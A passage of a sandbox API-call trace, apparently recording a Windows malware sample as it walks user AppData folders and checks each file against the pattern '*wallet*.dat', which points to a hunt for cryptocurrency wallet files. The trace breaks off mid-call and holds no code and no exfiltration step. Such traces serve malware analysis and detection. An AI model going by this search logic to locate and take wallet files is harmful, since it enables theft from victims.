ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9ee78381, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x6, dwReserved1=0x4c0260, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.357] StrCmpCA (pszStr1="desktop.ini", pszStr2=".") returned 54 [0175.357] StrCmpCA (pszStr1="desktop.ini", pszStr2="..") returned 54 [0175.357] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0175.357] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0175.357] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 52 [0175.357] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0175.357] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini\\*") returned 92 [0175.357] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x3d053a9f, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x3d053a9f, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x9ee78381, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x94, nFileSizeLow=0x6, dwReserved0=0x4c0260, dwReserved1=0x650064, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0175.357] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6654de95, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x83f70c52, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x4be, dwReserved0=0x6, dwReserved1=0x4c0260, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0175.357] StrCmpCA (pszStr1="Microsoft Outlook.lnk", pszStr2=".") returned 31 [0175.357] StrCmpCA (pszStr1="Microsoft Outlook.lnk", pszStr2="..") returned 31 [0175.357] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 100 [0175.357] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0175.357] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 62 [0175.357] PathMatchSpecA (pszFile="Microsoft Outlook.lnk", pszSpec="*wallet*.dat") returned 0 [0175.357] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk\\*") returned 102 [0175.357] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x6654de95, ftCreationTime.dwLowDateTime=0x1d70699, ftCreationTime.dwHighDateTime=0x6654de95, ftLastAccessTime.dwLowDateTime=0x1d70699, ftLastAccessTime.dwHighDateTime=0x83f70c52, ftLastWriteTime.dwLowDateTime=0x1d8a651, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4be, nFileSizeLow=0x6, dwReserved0=0x4c0260, dwReserved1=0x69004d, cFileName="c", cAlternateFileName="C")) returned 0xffffffff [0175.357] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x251fff9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x6, dwReserved1=0x4c0260, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0175.357] StrCmpCA (pszStr1="Shows Desktop.lnk", pszStr2=".") returned 37 [0175.358] StrCmpCA (pszStr1="Shows Desktop.lnk", pszStr2="..") returned 37 [0175.358] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 96 [0175.358] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0175.358] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 58 [0175.358] PathMatchSpecA (pszFile="Shows Desktop.lnk", pszSpec="*wallet*.dat") returned 0 [0175.358] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk\\*") returned 98 [0175.358] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x3d053a9f, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x3d053a9f, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x251fff9e, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x160, nFileSizeLow=0x6, dwReserved0=0x4c0260, dwReserved1=0x680053, cFileName="o", cAlternateFileName="C")) returned 0xffffffff [0175.358] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6, dwReserved1=0x4c0260, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0175.358] StrCmpCA (pszStr1="User Pinned", pszStr2=".") returned 39 [0175.358] StrCmpCA (pszStr1="User Pinned", pszStr2="..") returned 39 [0175.358] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 90 [0175.358] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0175.358] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 52 [0175.358] PathMatchSpecA (pszFile="User Pinned", pszSpec="*wallet*.dat") returned 0 [0175.358] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned 92 [0175.358] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x4c0260, cFileName=".", cAlternateFileName="")) returned 0x4eab90 [0175.358] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.358] FindNextFileA (in: hFindFile=0x4eab90, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x4c0260, cFileName="..", cAlternateFileName="")) returned 1 [0175.358] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.358] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.358] FindNextFileA (in: hFindFile=0x4eab90, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x4c0260, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0175.358] StrCmpCA (pszStr1="ImplicitAppShortcuts", pszStr2=".") returned 27 [0175.358] StrCmpCA (pszStr1="ImplicitAppShortcuts", pszStr2="..") returned 27 [0175.359] wsprintfA (in: param_1=0x19685c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 111 [0175.359] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszStr2="") returned 77 [0175.359] wsprintfA (in: param_1=0x196964, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 73 [0175.359] PathMatchSpecA (pszFile="ImplicitAppShortcuts", pszSpec="*wallet*.dat") returned 0 [0175.359] wsprintfA (in: param_1=0x19652c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned 113 [0175.359] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\*"), lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eacd0 [0175.359] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.359] FindNextFileA (in: hFindFile=0x4eacd0, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.359] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.359] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.360] FindNextFileA (in: hFindFile=0x4eacd0, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0175.360] FindClose (in: hFindFile=0x4eacd0 | out: hFindFile=0x4eacd0) returned 1 [0175.360] FindNextFileA (in: hFindFile=0x4eab90, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0175.360] StrCmpCA (pszStr1="TaskBar", pszStr2=".") returned 38 [0175.360] StrCmpCA (pszStr1="TaskBar", pszStr2="..") returned 38 [0175.360] wsprintfA (in: param_1=0x19685c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 98 [0175.360] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszStr2="") returned 77 [0175.360] wsprintfA (in: param_1=0x196964, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 60 [0175.360] PathMatchSpecA (pszFile="TaskBar", pszSpec="*wallet*.dat") returned 0 [0175.360] wsprintfA (in: param_1=0x19652c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned 100 [0175.360] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\*"), lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ea710 [0175.360] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.360] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.360] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.360] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.360] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.360] StrCmpCA (pszStr1="desktop.ini", pszStr2=".") returned 54 [0175.360] StrCmpCA (pszStr1="desktop.ini", pszStr2="..") returned 54 [0175.360] wsprintfA (in: param_1=0x1961d4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0175.360] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszStr2="") returned 77 [0175.360] wsprintfA (in: param_1=0x1962dc, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 72 [0175.361] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0175.361] wsprintfA (in: param_1=0x195ea4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini\\*") returned 112 [0175.361] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0xad164063, ftCreationTime.dwLowDateTime=0x1d7006b, ftCreationTime.dwHighDateTime=0xad164063, ftLastAccessTime.dwLowDateTime=0x1d7006b, ftLastAccessTime.dwHighDateTime=0xad18a23e, ftLastWriteTime.dwLowDateTime=0x1d7006b, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x53, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0175.361] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 1 [0175.361] StrCmpCA (pszStr1="File Explorer.lnk", pszStr2=".") returned 24 [0175.361] StrCmpCA (pszStr1="File Explorer.lnk", pszStr2="..") returned 24 [0175.361] wsprintfA (in: param_1=0x1961d4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 116 [0175.361] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszStr2="") returned 77 [0175.361] wsprintfA (in: param_1=0x1962dc, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 78 [0175.361] PathMatchSpecA (pszFile="File Explorer.lnk", pszSpec="*wallet*.dat") returned 0 [0175.361] wsprintfA (in: param_1=0x195ea4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk\\*") returned 118 [0175.361] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\file explorer.lnk\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0xad164063, ftCreationTime.dwLowDateTime=0x1d7006b, ftCreationTime.dwHighDateTime=0xad164063, ftLastAccessTime.dwLowDateTime=0x1d7006b, ftLastAccessTime.dwHighDateTime=0x252988fc, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x197, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x690046, cFileName="l", cAlternateFileName="C")) returned 0xffffffff [0175.361] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 0 [0175.361] FindClose (in: hFindFile=0x4ea710 | out: hFindFile=0x4ea710) returned 1 [0175.361] FindNextFileA (in: hFindFile=0x4eab90, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0175.361] FindClose (in: hFindFile=0x4eab90 | out: hFindFile=0x4eab90) returned 1 [0175.361] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0175.361] StrCmpCA (pszStr1="Window Switcher.lnk", pszStr2=".") returned 41 [0175.361] StrCmpCA (pszStr1="Window Switcher.lnk", pszStr2="..") returned 41 [0175.362] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 98 [0175.362] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0175.362] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 60 [0175.362] PathMatchSpecA (pszFile="Window Switcher.lnk", pszSpec="*wallet*.dat") returned 0 [0175.362] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk\\*") returned 100 [0175.362] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x3d02d92b, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x3d02d92b, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x252261fd, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x14e, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x690057, cFileName="n", cAlternateFileName="")) returned 0xffffffff [0175.362] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0175.362] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.362] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14e, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0175.362] StrCmpCA (pszStr1="UserData", pszStr2=".") returned 39 [0175.362] StrCmpCA (pszStr1="UserData", pszStr2="..") returned 39 [0175.362] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 74 [0175.362] StrCmpCA (pszStr1="Microsoft\\Internet Explorer", pszStr2="") returned 77 [0175.362] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\UserData") returned 36 [0175.362] PathMatchSpecA (pszFile="UserData", pszSpec="*wallet*.dat") returned 0 [0175.362] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned 76 [0175.362] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet 